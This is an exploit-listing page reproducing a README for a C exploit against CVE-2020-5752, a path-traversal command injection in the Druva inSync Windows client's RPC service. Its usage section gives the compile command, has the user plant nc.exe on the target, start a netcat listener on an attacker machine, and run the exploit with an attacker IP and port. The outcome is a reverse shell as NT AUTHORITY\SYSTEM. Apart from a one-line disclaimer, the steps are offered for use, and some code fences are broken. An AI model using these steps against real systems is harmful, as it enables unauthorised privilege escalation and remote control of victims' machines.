Exploit for Path Traversal in Druva Insync_Client CVE-2020-5752

Name: Exploit for Path Traversal in Druva Insync_Client CVE-2020-5752
Rating: 5 (173 reviews)

2026-01-13 | CVSS 7.8

## https://sploitus.com/exploit?id=16EB0423-FAEF-5FD9-9652-100925696C25
# CVE-2020-5752: Druva inSync Local Privilege Escalation

A C-based exploit for the **Druva inSync Windows Client (v6.6.3 and below)**. The application exposes an RPC service on port 6064 that is vulnerable to command injection via path traversal. This allows a local user to execute arbitrary commands as `NT AUTHORITY\SYSTEM`.

## Vulnerability Details
- **CVE:** 2020-5752
- **Tested on:** Windows 10 (x64)
- **Privilege Level:** Local Privilege Escalation (LPE)

## Usage

### 1. Compilation
Use `gcc` (MinGW) to compile the source code:
```bash
gcc exploit.c -o exploit.exe -lws2_32
```

### 2. Preparation
Place a copy of nc.exe in a directory accessible by the SYSTEM account (e.g., C:\Windows\Tasks\).

### 3. Execution
Start a listener on your attacker machine:
```bash

nc -lvnp 4444
Run the exploit on the target Windows machine:
```

```dos
exploit.exe   
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
```
### Disclaimer
This tool is for educational purposes only. Unauthorized use on systems you do not have permission to test is illegal